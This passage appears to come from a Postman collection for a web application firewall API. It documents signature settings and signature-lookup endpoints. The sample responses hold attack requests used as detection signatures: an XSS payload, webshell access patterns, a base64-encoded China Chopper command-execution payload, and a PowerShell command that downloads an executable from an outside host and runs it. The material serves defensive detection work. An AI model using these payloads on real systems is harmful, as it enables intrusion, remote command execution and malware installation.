ID"}]}},"status":"OK","code":200,"_postman_previewlanguage":"json","header":[{"key":"Date","value":"Tue, 02 Jul 2019 03:43:12 GMT"},{"key":"Content-Type","value":"application/json"},{"key":"Content-Length","value":"297"},{"key":"Connection","value":"keep-alive"},{"key":"x-amzn-RequestId","value":"8351892a-9c7b-11e9-b6ff-67184953ff53"},{"key":"Access-Control-Allow-Origin","value":"https://tim.waasonline.com"},{"key":"x-amz-apigw-id","value":"cLXgVHc8oAMFUPA="},{"key":"X-Amzn-Trace-Id","value":"Root=1-5d1ad2ce-30f81f46461058aa677fb60e;Sampled=0"}],"cookie":[],"responseTime":null,"body":"{\n    \"detail\": \"successfully\",\n    \"known attacks\": \"enable\",\n    \"Cross Site Scripting\": \"enable\",\n    \"SQL Injection\": \"enable\",\n    \"Generic Attacks\": \"enable\",\n    \"Known Exploits\": \"enable\",\n    \"Trojans\": \"enable\",\n    \"SQL Injection (Syntax Based Detection)\": \"enable\",\n    \"action\": \"alert\",\n    \"exception rule\": [\n        {\n            \"signature_name\": \"SQL Injection\",\n            \"signature_id\": \"030000001\",\n            \"url\": {\"value\": \"/test\",\"operator\": \"STRING_MATCH\", \"status\": \"enable\"},\n            \"parameter\": {\"value\": \"abc\",\"operator\": \"STRING_MATCH\", \"status\": \"enable\"}\n        }\n    ],\n    \"syntax based exception\": [\n        {\n            \"attack_category\": \"SQL Injection (Syntax Based Detection)\",\n            \"attack_name\": \"Stacked Queries SQL Injection\",\n            \"url\": {\"value\": \"/test\",\"operator\": \"STRING_MATCH\", \"status\": \"enable\"},\n            \"parameter\": {\"value\": \"abc\",\"operator\": \"STRING_MATCH\", \"status\": \"enable\"}\n        }\n    ]\n}"}],"_postman_id":"611e3ec0-6ecb-49ef-a772-c9e90392e359"},{"name":"Get Signature Info","id":"47018359-c2c0-42ad-9f20-df8f5f0fc921","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"GET","header":[{"key":"Authorization","type":"text","value":"Basic {{api-key-secret}}"}],"url":"https://api.tim.waasonline.com/v1/application/signature-info?signature_id={{signature_id}}&attack_category={{attack_category}}","description":"<p>Get the signature information.</p>\n<blockquote>\n<p>Requires API key secret as <code>Authorization</code> request header. See <b>Request format<b> section for API key secret details.</b></b></p>\n</blockquote>\n","urlObject":{"protocol":"https","path":["v1","application","signature-info"],"host":["api","tim","waasonline","com"],"query":[{"description":{"content":"<p>Signature ID</p>\n","type":"text/plain"},"key":"signature_id","value":"{{signature_id}}"},{"description":{"content":"<p>The signature category name such as 'Cross Site Scripting', 'Generic Attacks'.</p>\n","type":"text/plain"},"key":"attack_category","value":"{{attack_category}}"}],"variable":[]}},"response":[{"id":"3859387f-e8aa-4891-aa8d-15c7d0cde716","name":"Fail","originalRequest":{"method":"GET","header":[{"key":"Authorization","value":"Basic {{api-key-secret}}","type":"text"}],"url":{"raw":"https://api.tim.waasonline.com/v1/application/signature-info?signature_id={{signature_id}}&attack_category={{attack_category}}","protocol":"https","host":["api","tim","waasonline","com"],"path":["v1","application","signature-info"],"query":[{"key":"signature_id","value":"{{signature_id}}","description":"Signature ID"},{"key":"attack_category","value":"{{attack_category}}","description":"The signature category name such as 'Cross Site Scripting', 'Generic Attacks'."}]}},"status":"Bad Request","code":400,"_postman_previewlanguage":"json","header":[{"key":"Date","value":"Thu, 06 Jun 2019 07:27:39 GMT"},{"key":"Content-Type","value":"application/json"},{"key":"Content-Length","value":"64"},{"key":"Connection","value":"keep-alive"},{"key":"x-amzn-RequestId","value":"90360a9f-882c-11e9-a8f7-9de7e402d0c8"},{"key":"Access-Control-Allow-Origin","value":"https://tim.waasonline.com"},{"key":"x-amz-apigw-id","value":"a2MAuHnkoAMFoUA="},{"key":"X-Amzn-Trace-Id","value":"Root=1-5cf8c06b-97dd52c75119b4d764047b77;Sampled=0"}],"cookie":[],"responseTime":null,"body":"{\n    \"detail\": \"ileggal attack category [WrongCategory] parameter.\"\n}"},{"id":"45697d31-306a-4800-a226-eb88486a7e60","name":"SuccessGetSingleSignature","originalRequest":{"method":"GET","header":[{"key":"Authorization","value":"Basic {{api-key-secret}}","type":"text"}],"url":{"raw":"https://api.tim.waasonline.com/v1/application/signature-info?attack_category={{attack_category}}&signature_id={{signature_id}}","protocol":"https","host":["api","tim","waasonline","com"],"path":["v1","application","signature-info"],"query":[{"key":"attack_category","value":"{{attack_category}}","description":"The signature category name  such as  'Cross Site Scripting', 'Generic Attacks'."},{"key":"signature_id","value":"{{signature_id}}","description":"Signature ID"}]}},"status":"OK","code":200,"_postman_previewlanguage":"json","header":[{"key":"Date","value":"Thu, 06 Jun 2019 07:29:27 GMT"},{"key":"Content-Type","value":"application/json"},{"key":"Content-Length","value":"799"},{"key":"Connection","value":"keep-alive"},{"key":"x-amzn-RequestId","value":"d087097a-882c-11e9-a915-21bbe423a76f"},{"key":"Access-Control-Allow-Origin","value":"https://tim.waasonline.com"},{"key":"x-amz-apigw-id","value":"a2MRlE9koAMFjEQ="},{"key":"X-Amzn-Trace-Id","value":"Root=1-5cf8c0d6-96d513aaf69790e5d220dc28;Sampled=0"}],"cookie":[],"responseTime":null,"body":"{\n    \"Cross Site Scripting\": [\n        {\n            \"id\": \"010000027\",\n            \"desc\": \"This signature prevents attackers from adding event processing functions for \\\"onblur\\\" event. This injection can be achieved in HTTP request URL or HTTP arguments.\\n\",\n            \"sample\": \"POST /attackinfo/attack_test HTTP/1.1\\r\\nAccept: text/html, application/xhtml+xml, */*\\r\\nReferer: http://www.mysite.com\\r\\nAccept-Language: zh-cn\\r\\nUser-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.0; Trident/5.0)\\r\\nContent-Type: application/x-www-form-urlencoded\\r\\nAccept-Encoding: gzip, deflate\\r\\nHost: www.mysite.com\\r\\nContent-Length: 80\\r\\nConnection: Keep-Alive\\r\\nCache-Control: no-cache\\r\\nCookie: ASPSESSIONIDSSSRSCQC=NLJDKABDHLCCNEDHAMCCDAAC\\r\\n\\r\\nfunc1=test_xss_attack&func2=<#onblur%3D\\\"alert('xss-onclick')\\\"#>&func3=xss_attack_end\"\n        }\n    ]\n}"},{"id":"f9190911-8bd2-40e1-93db-fd5171b345b2","name":"Success","originalRequest":{"method":"GET","header":[{"key":"Authorization","value":"Basic {{api-key-secret}}","type":"text"}],"url":{"raw":"https://api.tim.waasonline.com/v1/application/signature-info?attack_category={{attack_category}}&signature_id={{signature_id}}","protocol":"https","host":["api","tim","waasonline","com"],"path":["v1","application","signature-info"],"query":[{"key":"attack_category","value":"{{attack_category}}","description":"The signature category  name  such as  'Cross Site Scripting', 'Generic Attacks'."},{"key":"signature_id","value":"{{signature_id}}","description":"Signature ID"}]}},"status":"OK","code":200,"_postman_previewlanguage":"json","header":[{"key":"Date","value":"Thu, 06 Jun 2019 03:49:33 GMT"},{"key":"Content-Type","value":"application/json"},{"key":"Content-Length","value":"13557"},{"key":"Connection","value":"keep-alive"},{"key":"x-amzn-RequestId","value":"180b15e3-880e-11e9-a1a6-01cf926e45af"},{"key":"Access-Control-Allow-Origin","value":"https://tim.waasonline.com"},{"key":"x-amz-apigw-id","value":"a1sD9H1OIAMFz3w="},{"key":"X-Amzn-Trace-Id","value":"Root=1-5cf88d4c-a83f93202d568bccd2345de8;Sampled=0"}],"cookie":[],"responseTime":null,"body":"{\n    \"Trojans\": [\n        {\n            \"id\": \"070000001\",\n            \"desc\": \"This rule detects if there are specific header names which are used by trojan horses in HTTP headers. \\nThis injection can be achieved in HTTP request header names.\\n\",\n            \"sample\": \"GET /rootkit.php HTTP/1.1\\r\\nHost: yoursite.com\\r\\nReferer: http://yoursite.com/\\r\\nUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR1.1.4322)\\r\\nPragma: no-cache\\r\\nAccept: */*\\r\\n<#X_File:#> data.txt\\r\\nConnection: Keep-Alive\\r\\nCookie:CustomCookie=WebInspect0\\r\\n\\r\\n\"\n        },\n        {\n            \"id\": \"070000004\",\n            \"desc\": \"This signature prevents attackers from performing Command injection attacks using commands.\\nThis attack can be achieved in HTTP request URL and arguments.\",\n            \"sample\": \"POST /c99.php?<#act=encoder&d=#>%2Fvar%2Fwww%2F HTTP/1.1\\r\\nAccept: text/html, application/xhtml+xml, */*\\r\\nReferer: http://www.mysite.com\\r\\nAccept-Language: zh-cn\\r\\nUser-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.0; Trident/5.0)\\r\\nContent-Type: application/x-www-form-urlencoded\\r\\nAccept-Encoding: gzip, deflate\\r\\nHost: www.mysite.com\\r\\nContent-Length: 21\\r\\nConnection: Keep-Alive\\r\\nCache-Control: no-cache\\r\\nCookie: ASPSESSIONIDSSSRSCQC=NLJDKABDHLCCNEDHAMCCDAAC\\r\\n\\r\\nencoder_input=abcdefg\"\n        },\n        {\n            \"id\": \"070000005\",\n            \"desc\": \"This signature prevents attackers from accessing P.A.S Webshell located on the target webserver. This attack can be achieved in HTTP response body.\",\n            \"sample\": \"HTTP/1.1 200 OK\\r\\nDate: Sun, 06 Nov 2011 08:20:35 GMT\\r\\nServer: Apache/2.2.17 (Unix)\\r\\nContent-Length: 3384\\r\\nKeep-Alive: timeout=5, max=100\\r\\nConnection: Keep-Alive\\r\\nContent-Type: text/html\\r\\n\\r\\n<html> \\r\\n\\t<head> \\r\\n\\t\\t<meta http-equiv=\\\"Content-Type\\\" content=\\\"text/html; charset=UTF-8\\\"/> \\r\\n\\t\\t<title>127.0.0.1</title> \\r\\n\\t\\t<script>\\r\\n\\t\\t\\tfunction ca(v, f) { \\r\\n\\t\\t\\t\\tvar cb=document.getElementById(f);\\r\\n\\t\\t\\t\\tfor(i=1, n=cb.elements.length; i<n; i++){\\r\\n\\t\\t\\t\\t\\tif(cb.elements[i].type=='checkbox') \\r\\n\\t\\t\\t\\t\\t\\tcb.elements[i].checked=v;\\r\\n\\t\\t\\t\\t}\\r\\n\\t\\t\\t}\\r\\n\\t\\t</script> \\r\\n\\t</head>\\r\\n\\t<body> \\r\\n\\t\\t<fieldset class=\\\"head\\\">\\r\\n\\t\\t\\t<table class=\\\"head\\\"> \\r\\n\\t\\t\\t\\t<tr><th style=\\\"width:125px\\\">Server address :</th>\\r\\n\\t\\t\\t\\t\\t<td>\\r\\n\\t\\t\\t\\t\\t\\t10.200.3.13:8080 on 10.200.3.13 (10.200.3.13:8080, 10.200.3.13) / jlufocus\\t\\t\\t\\t\\t\\t</td>\\r\\n\\t\\t\\t\\t\\t</tr>\\r\\n\\t\\t\\t\\t<tr>\\r\\n\\t\\t\\t\\t\\t<th>Server OS :</th>\\r\\n\\t\\t\\t\\t\\t<td>Linux 3.16.0-23-generic #31-Ubuntu SMP Tue Oct 21 17:56:17 UTC 2014 x86_64</td>\\r\\n\\t\\t\\t\\t</tr>\\r\\n\\t\\t\\t\\t<tr>\\r\\n\\t\\t\\t\\t\\t<th>Server software :</th>\\r\\n\\t\\t\\t\\t\\t<td><b>PHP</b>/5.5.12-2ubuntu4.4 <b>Apache</b>/2.4.10 (Ubuntu) <b>cURL</b> <b>MySQL</b>/5.5.40\\t\\t\\t\\t\\t</td>\\r\\n\\t\\t\\t\\t</tr>\\r\\n\\t\\t\\t\\t<tr>\\r\\n\\t\\t\\t\\t\\t<th>User info :</th>\\r\\n\\t\\t\\t\\t\\t<td>\\r\\n\\t\\t\\t\\t\\t\\tuid=33(www-data) gid=33(www-data)\\t\\t\\t\\t\\t</td>\\r\\n\\t\\t\\t\\t</tr>\\r\\n\\t\\t\\t\\t<tr><th>Disable functions :&nbsp;</th><td style=\\\"color:#FF4500\\\">pcntl_alarm, pcntl_fork, pcntl_waitpid, pcntl_wait, pcntl_wifexited, pcntl_wifstopped, pcntl_wifsignaled, pcntl_wexitstatus, pcntl_wtermsig, pcntl_wstopsig, pcntl_signal, pcntl_signal_dispatch, pcntl_get_last_error, pcntl_strerror, pcntl_sigprocmask, pcntl_sigwaitinfo, pcntl_sigtimedwait, pcntl_exec, pcntl_getpriority, pcntl_setpriority, </td></tr>\\t\\t\\t</table>\\r\\n\\t\\t</fieldset> \\r\\n\\t\\t<fieldset class=\\\"menu\\\">\\r\\n\\t\\t\\t<form action=\\\"\\\" method=\\\"post\\\"> \\r\\n\\t\\t\\t\\t<button type=\\\"submit\\\" name=\\\"fe\\\">Explorer</button> \\r\\n\\t\\t\\t\\t<button type=\\\"submit\\\" name=\\\"fs\\\">Searcher</button> \\r\\n\\t\\t\\t\\t<button type=\\\"submit\\\" name=\\\"se\\\">SQL-client</button> \\r\\n\\t\\t\\t\\t<button type=\\\"submit\\\" name=\\\"nt\\\">Network Tools</button> \\r\\n\\t\\t\\t\\t \\r\\n\\t\\t\\t\\t\\t<button type=\\\"submit\\\" name=\\\"br\\\">passwd BruteForce</button> \\r\\n\\t\\t\\t\\t \\r\\n\\t\\t\\t\\t<button type=\\\"submit\\\" name=\\\"sc\\\">CMD</button> \\r\\n\\t\\t\\t\\t<button type=\\\"submit\\\" name=\\\"si\\\">Server info</button> \\r\\n\\t\\t\\t</form>\\r\\n\\t\\t</fieldset>  \\r\\n\\t\\t<fieldset class=\\\"nav\\\">\\r\\n\\t\\t\\t<table width=\\\"100%\\\">\\r\\n\\t\\t\\t\\t<tr>\\r\\n\\t\\t\\t\\t\\t<th width=\\\"50px\\\" align=\\\"left\\\">Go to :</th>\\r\\n\\t\\t\\t\\t</tr>\\r\\n\\t\\t\\t</table>\\r\\n\\t\\t\\t</fieldset> \\r\\n\\t\\t\\t<fieldset class=\\\"nav\\\">\\r\\n\\t\\t\\t\\t<form action=\\\"\\\" method=\\\"post\\\">\\r\\n\\t\\t\\t\\t<input type=\\\"hidden\\\" name=\\\"fe\\\"/><b>Jump :</b>&nbsp;\\r\\n\\t\\t\\t\\t<button type=\\\"submit\\\"name=\\\"fp\\\"class=\\\"sb\\\"value=\\\"/\\\">/</button><button type=\\\"submit\\\"name=\\\"fp\\\"class=\\\"sb\\\"value=\\\"/var/\\\">var/</button><button type=\\\"submit\\\"name=\\\"fp\\\"class=\\\"sb\\\"value=\\\"/var/www/\\\">www/</button><button type=\\\"submit\\\"name=\\\"fp\\\"class=\\\"sb\\\"value=\\\"/var/www/html/\\\">html/</button><button type=\\\"submit\\\"name=\\\"fp\\\"class=\\\"sb\\\"value=\\\"/var/www/html/c99/\\\">c99/</button>\\t\\t\\t\\t</form>\\r\\n\\t\\t\\t</fieldset>\\r\\n\\t\\t\\t\\t\\t\\t\\t<fieldset style='font:normal 12px \\\"Courier New\\\"'>\\r\\n\\t\\t\\t\\t\\t<form action=\\\"\\\" method=\\\"post\\\" style=\\\"margin-bottom:5px;\\\">Exec : \\r\\n\\t\\t\\t\\t\\t\\t<input type=\\\"text\\\" name=\\\"ex\\\" value=\\\"uname -a\\\" style=\\\"width:895px;\\\"/> \\r\\n\\t\\t\\t\\t\\t\\t<button type=\\\"submit\\\" name=\\\"sc\\\">&gt;</button>\\r\\n\\t\\t\\t\\t\\t</form>\\r\\n\\t\\t\\t\\t\\t<form action=\\\"\\\" method=\\\"post\\\" style=\\\"margin-top:5px\\\">Eval : \\r\\n\\t\\t\\t\\t\\t\\t<input type=\\\"text\\\" name=\\\"ev\\\" value=\\\"phpinfo();\\\" style=\\\"width:895px;\\\"/> \\r\\n\\t\\t\\t\\t\\t\\t<button type=\\\"submit\\\" name=\\\"sc\\\">&gt;</button>\\r\\n\\t\\t\\t\\t\\t</form>\\r\\n\\t\\t\\t\\t</fieldset>\\r\\n\\t\\t\\t\\t<fieldset class=\\\"footer\\\">\\r\\n\\t\\t\\t\\t\\t<table width=\\\"100%\\\" border=\\\"0\\\">\\r\\n\\t\\t\\t\\t\\t\\t<tr>\\r\\n\\t\\t\\t\\t\\t\\t\\t<#<td>P.A.S. v.3.1.4</td>#>\\r\\n\\t\\t\\t\\t\\t\\t\\t<td align=\\\"center\\\">\\r\\n\\t\\t\\t\\t\\t\\t\\t</td>\\r\\n\\t\\t\\t\\t\\t\\t\\t<td align=\\\"right\\\">0.000 s.</td>\\r\\n\\t\\t\\t\\t\\t\\t</tr>\\r\\n\\t\\t\\t\\t\\t</table>\\r\\n\\t\\t\\t\\t</fieldset>\\r\\n\\t</body>\\r\\n</html>\"\n        },\n        {\n            \"id\": \"070000006\",\n            \"desc\": \"This signature prevents attackers from accessing RC-SHELL Webshell located on the target webserver. This attack can be achieved in HTTP response body.\",\n            \"sample\": \"HTTP/1.1 200 OK\\r\\nDate: Sun, 06 Nov 2011 08:20:35 GMT\\r\\nServer: Apache/2.2.17 (Unix)\\r\\nContent-Length: 343\\r\\nKeep-Alive: timeout=5, max=100\\r\\nConnection: Keep-Alive\\r\\nContent-Type: text/html\\r\\n\\r\\n<html> \\r\\n<head>\\r\\n<meta http-equiv=\\\"Content-Type\\\" content=\\\"text/html\\\">\\r\\n<link rel=\\\"shortcut icon\\\" href=\\\"?act=i&amp;img=exe\\\">\\r\\n<title>[ RC-SHELL v2.0.2011.1009 - 10.200.3.13 - 10.200.3.13 ]</title>\\r\\n...\\r\\n<td class=\\\"tdfooter\\\">\\r\\n<#RC-SHELL v2.0.2011.1009 : PAGE GENERATED IN 0.0121 SECONDS</td>#>\\r\\n<td align=\\\"right\\\" class=\\\"tdfooter\\\">\\r\\n</body>\\r\\n</html>\"\n        },\n        {\n            \"id\": \"070000007\",\n            \"desc\": \"This signature prevents attackers from accessing b374 Webshell located on the target webserver. This attack can be achieved in HTTP response body.\",\n            \"sample\": \"HTTP/1.1 200 OK\\r\\nDate: Sun, 06 Nov 2011 08:20:35 GMT\\r\\nServer: Apache/2.2.17 (Unix)\\r\\nContent-Length: 287\\r\\nKeep-Alive: timeout=5, max=100\\r\\nConnection: Keep-Alive\\r\\nContent-Type: text/html\\r\\n\\r\\n<html> \\r\\n<head>\\r\\n<title>b374k 3.2.2</title>\\r\\n</head>\\r\\n<body>\\r\\n<div id='wrapper'>\\r\\n\\t<!--header start-->\\r\\n\\t<div id='header'>\\r\\n\\t\\t<!--header info start-->\\r\\n\\t\\t<div id='headerNav'>\\r\\n<span><#<a onclick=\\\"set_cookie('cwd', '');\\\" href='/b374k-3.2.2.php'>b374k 3.2.2</a></span>#>\\r\\n...\\r\\n</body>\\r\\n</html>\"\n        },\n        {\n            \"id\": \"070000008\",\n            \"desc\": \"This signature prevents attackers from accessing backdoor in WP Custom Content Type Manager. This attack can be achieved in HTTP request URL.\",\n            \"sample\": \"GET /<#plugins/custom-content-type-manager/auto-update.php#> HTTP/1.1\\r\\nHost: yoursite.com\\r\\nReferer: http://yoursite.com/\\r\\nUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR1.1.4322)\\r\\nPragma: no-cache\\r\\nAccept: */*\\r\\nConnection: Keep-Alive\\r\\nCookie:CustomCookie=WebInspect0\\r\\n\\r\\n\"\n        },\n        {\n            \"id\": \"070000009\",\n            \"desc\": \"This signature prevents attackers from accessing China Chooper Web backdoor. This attack can be achieved in HTTP request argument.\",\n            \"sample\": \"POST /evil.aspx HTTP/1.1\\r\\nHost: yoursite.com\\r\\nConnection: close\\r\\nUser-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)\\r\\nAccept: */*\\r\\nContent-Length: 1108\\r\\nContent-Type: application/x-www-form-urlencoded\\r\\n\\r\\nPassword=Response.Write(\\\"->|\\\");<#var err:Exception;try{eval(System.Text.Encoding.GetEncoding(65001).GetString(System. Convert.FromBase64String(\\\"dmFyIGM9bmV3IFN5c3RlbS5EaWFnbm9zdGljcy5Qcm9jZXNzU3RhcnRJbmZvKFN5c3RlbS5UZXh0LkVuY29kaW5nLkdldEVuY29kaW5nKDY1MDAxKS5HZXRTdHJpbmcoU3lzdGVtLkNvbnZlcnQuRnJvbUJhc2U2NFN0cmluZyhSZXF1ZXN0Lkl0ZW1bInoxIl0pKSk7dmFyIGU9bmV3IFN5c3RlbS5EaWFnbm9zdGljcy5Qcm9jZXNzKCk7dmFyIG91dDpTeXN0ZW0uSU8uU3RyZWFtUmVhZGVyLEVJOlN5c3RlbS5JTy5TdHJlYW1SZWFkZXI7Yy5Vc2VTaGVsbEV4ZWN1dGU9ZmFsc2U7Yy5SZWRpcmVjdFN0YW5kYXJkT3V0cHV0PXRydWU7Yy5SZWRpcmVjdFN0YW5kYXJkRXJyb3I9dHJ1ZTtlLlN0YXJ0SW5mbz1jO2MuQXJndW1lbnRzPSIvYyAiK1N5c3RlbS5UZXh0LkVuY29kaW5nLkdldEVuY29kaW5nKDY1MDAxKS5HZXRTdHJpbmcoU3lzdGVtLkNvbnZlcnQuRnJvbUJhc2U2NFN0cmluZyhSZXF1ZXN0Lkl0ZW1bInoyIl0pKTtlLlN0YXJ0KCk7b3V0PWUuU3RhbmRhcmRPdXRwdXQ7RUk9ZS5TdGFuZGFyZEVycm9yO2UuQ2xvc2UoKTtSZXNwb25zZS5Xcml0ZShvdXQuUmVhZFRvRW5kKCkrRUkuUmVhZFRvRW5kKCkpOw%3D%3D\\\")),\\\"unsafe\\\");}catch(err){Response.Write(\\\"ERROR:// \\\"%2Berr.message);}Response.Write(\\\"|<-\\\");Response.End();#>&<#z1#>=Y21k&<#z2#>=Y2QgL2QgImM6XGluZXRwdWJcd3d3cm9vdFwiJndob2FtaSZlY2hvIFtTXSZjZCZlY2hvIFtFXQ%3D%3D\"\n        },\n        {\n            \"id\": \"070000010\",\n            \"desc\": \"null\",\n            \"sample\": \"POST /evil.aspx HTTP/1.1\\r\\nHost: yoursite.com\\r\\nConnection: close\\r\\nUser-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)\\r\\nAccept: */*\\r\\nContent-Length: 1108\\r\\nContent-Type: application/x-www-form-urlencoded\\r\\n\\r\\nPassword=Response.Write(\\\"->|\\\");<#var err:Exception;try{eval(System.Text.Encoding.GetEncoding(65001).GetString(System. Convert.FromBase64String(\\\"dmFyIGM9bmV3IFN5c3RlbS5EaWFnbm9zdGljcy5Qcm9jZXNzU3RhcnRJbmZvKFN5c3RlbS5UZXh0LkVuY29kaW5nLkdldEVuY29kaW5nKDY1MDAxKS5HZXRTdHJpbmcoU3lzdGVtLkNvbnZlcnQuRnJvbUJhc2U2NFN0cmluZyhSZXF1ZXN0Lkl0ZW1bInoxIl0pKSk7dmFyIGU9bmV3IFN5c3RlbS5EaWFnbm9zdGljcy5Qcm9jZXNzKCk7dmFyIG91dDpTeXN0ZW0uSU8uU3RyZWFtUmVhZGVyLEVJOlN5c3RlbS5JTy5TdHJlYW1SZWFkZXI7Yy5Vc2VTaGVsbEV4ZWN1dGU9ZmFsc2U7Yy5SZWRpcmVjdFN0YW5kYXJkT3V0cHV0PXRydWU7Yy5SZWRpcmVjdFN0YW5kYXJkRXJyb3I9dHJ1ZTtlLlN0YXJ0SW5mbz1jO2MuQXJndW1lbnRzPSIvYyAiK1N5c3RlbS5UZXh0LkVuY29kaW5nLkdldEVuY29kaW5nKDY1MDAxKS5HZXRTdHJpbmcoU3lzdGVtLkNvbnZlcnQuRnJvbUJhc2U2NFN0cmluZyhSZXF1ZXN0Lkl0ZW1bInoyIl0pKTtlLlN0YXJ0KCk7b3V0PWUuU3RhbmRhcmRPdXRwdXQ7RUk9ZS5TdGFuZGFyZEVycm9yO2UuQ2xvc2UoKTtSZXNwb25zZS5Xcml0ZShvdXQuUmVhZFRvRW5kKCkrRUkuUmVhZFRvRW5kKCkpOw%3D%3D\\\")),\\\"unsafe\\\");}catch(err){Response.Write(\\\"ERROR:// \\\"%2Berr.message);}Response.Write(\\\"|<-\\\");Response.End();#>&<#z1#>=Y21k&<#z2#>=Y2QgL2QgImM6XGluZXRwdWJcd3d3cm9vdFwiJndob2FtaSZlY2hvIFtTXSZjZCZlY2hvIFtFXQ%3D%3D\"\n        },\n        {\n            \"id\": \"070000011\",\n            \"desc\": \"This signature prevents attackers from scanning MuieBlackCat Bot. This attack can be achieved in HTTP request URL.\",\n            \"sample\": \"GET /<#muieblackcat#> HTTP/1.1\\r\\nReferer: http://yoursite.com/\\r\\nUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR1.1.4322)\\r\\nPragma: no-cache\\r\\nAccept: */*\\r\\nHost: yoursite.com\\r\\nConnection: Keep-Alive\\r\\nCookie:CustomCookie=WebInspect0\\r\\n\\r\\n\"\n        },\n        {\n            \"id\": \"070000012\",\n            \"desc\": \"This signature prevents attackers from scanning w00tw00t Bot. This attack can be achieved in HTTP request URL.\",\n            \"sample\": \"GET /<#w00tw00t.at.ISC.SANS.DFind#> HTTP/1.1\\r\\nReferer: http://yoursite.com/\\r\\nUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR1.1.4322)\\r\\nPragma: no-cache\\r\\nAccept: */*\\r\\nHost: yoursite.com\\r\\nConnection: Keep-Alive\\r\\nCookie:CustomCookie=WebInspect0\\r\\n\\r\\n\"\n        },\n        {\n            \"id\": \"070000013\",\n            \"desc\": \"This signature prevents attackers from scanning muhstik Bot. This attack can be achieved in HTTP request URL.\",\n            \"sample\": \"GET /<#muhstik.php#> HTTP/1.1\\r\\nReferer: http://yoursite.com/\\r\\nUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR1.1.4322)\\r\\nPragma: no-cache\\r\\nAccept: */*\\r\\nHost: yoursite.com\\r\\nConnection: Keep-Alive\\r\\nCookie:CustomCookie=WebInspect0\\r\\n\\r\\n\"\n        },\n        {\n            \"id\": \"070000014\",\n            \"desc\": \"This signature prevents attackers from scanning Miner Bot. This attack can be achieved in HTTP request URL and argument.\",\n            \"sample\": \"GET /<#public/hydra.php?xcmd=cmd.exe%20/c%20powershell%20(new-object%20System.Net.WebClient).DownloadFile('http://a46.bulehero.in/download.exe','C:/7.exe');start%20C:/7.exe #> HTTP/1.1\\r\\nReferer: http://yoursite.com/\\r\\nUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR1.1.4322)\\r\\nPragma: no-cache\\r\\nAccept: */*\\r\\nHost: yoursite.com\\r\\nConnection: Keep-Alive\\r\\nCookie:CustomCookie=WebInspect0\\r\\n\\r\\n\"\n        },\n        {\n            \"id\": \"070000015\",\n            \"desc\": \"null\",\n            \"sample\": \"GET /<#public/hydra.php?xcmd=cmd.exe%20/c%20powershell%20(new-object%20System.Net.WebClient).DownloadFile('http://a46.bulehero.in/download.exe','C:/7.exe');start%20C:/7.exe #> HTTP/1.1\\r\\nReferer: http://yoursite.com/\\r\\nUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR1.1.4322)\\r\\nPragma: no-cache\\r\\nAccept: */*\\r\\nHost: yoursite.com\\r\\nConnection: Keep-Alive\\r\\nCookie:CustomCookie=WebInspect0\\r\\n\\r\\n\"\n        },\n        {\n            \"id\": \"070000016\",\n            \"desc\": \"This signature prevents attackers from accessing ReDuh/reGeorg tunnel. This attack can be achieved in HTTP request header.\",\n            \"sample\": \"POST /tunnel.nosocket.php?cmd=read HTTP/1.1\\r\\n<#X-CMD: READ#>\\r\\nUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR1.1.4322)\\r\\nPragma: no-cache\\r\\nAccept: */*\\r\\nHost: yoursite.com\\r\\nConnection: Keep-Alive\\r\\nCookie:CustomCookie=WebInspect0\\r\\n\\r\\n\"\n        }\n    ]\n}"}],"_postman_id":"47018359-c2c0-42ad-9f20-df8f5f0fc921"},{"name":"Get Anomaly Detection","id":"12980701-1f09-48c4-8f43-265e7150bc6c","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"GET","header":[{"key":"Accept","value":"application/json"},{"key":"Authorization","type":"text","value":"Basic {{api-key-secret}}"}],"url":"https://api.tim.waasonline.com/v1/application/:ep_id/machinelearning","description":"<p>Get the configuration information of anomaly detection.</p>\n<blockquote>\n<p>Requires API key secret as <code>Authorization</code> request header. See <b>Request format<b> section for API key secret details.</b></b></p>\n</blockquote>\n","urlObject":{"protocol":"https","path":["v1","application",":ep_id","machinelearning"],"host":["api","tim","waasonline","com"],"query":[],"variable":[{"description":{"content":"<p>The application ID, it can be obtained from List Applications API.</p>\n","type":"text/plain"},"type":"string","value":"{{ep_id}}","key":"ep_id"}]}},"response":[{"id":"51c6d02b-f56f-41c5-9529-9f00ad6e3cb1","name":"Fail","originalRequest":{"method":"GET","header":[{"key":"Accept","value":"application/json"}],"url":{"raw":"https://api.tim.waasonline.com/v1/application/:ep_id/machinelearning","protocol":"https","host":["api","tim","waasonline","com"],"path":["v1","application",":ep_id","machinelearning"],"variable":[{"key":"ep_id","value":"{{ep_id}}"}]}},"status":"Unauthorized","code":401,"_postman_previewlanguage":"json","header":[{"key":"Date","value":"Tue, 04 Jun 2019 08:34:47 GMT"},{"key":"Content-Type","value":"application/json"},{"key":"Content-Length","value":"34"},{"key":"Connection","value":"keep-alive"},{"key":"x-amzn-RequestId","value":"9cc9e8b8-86a3-11e9-9c56-5df7ca7fdfd7"},{"key":"Access-Control-Allow-Origin","value":"https://tim.waasonline.com"},{"key":"x-amzn-ErrorType","value":"UnauthorizedException"},{"key":"x-amz-apigw-id","value":"avv-PF-5IAMF40A="}],"cookie":[],"responseTime":null,"body":"{\n    \"message\": \"Request unauthorized\"\n}"},{"id":"8a4cdb11-1d05-45c8-a799-f240f45e3107","name":"Success","originalRequest":{"method":"GET","header":[{"key":"Accept","value":"application/json"},{"key":"Authorization","value":"Basic 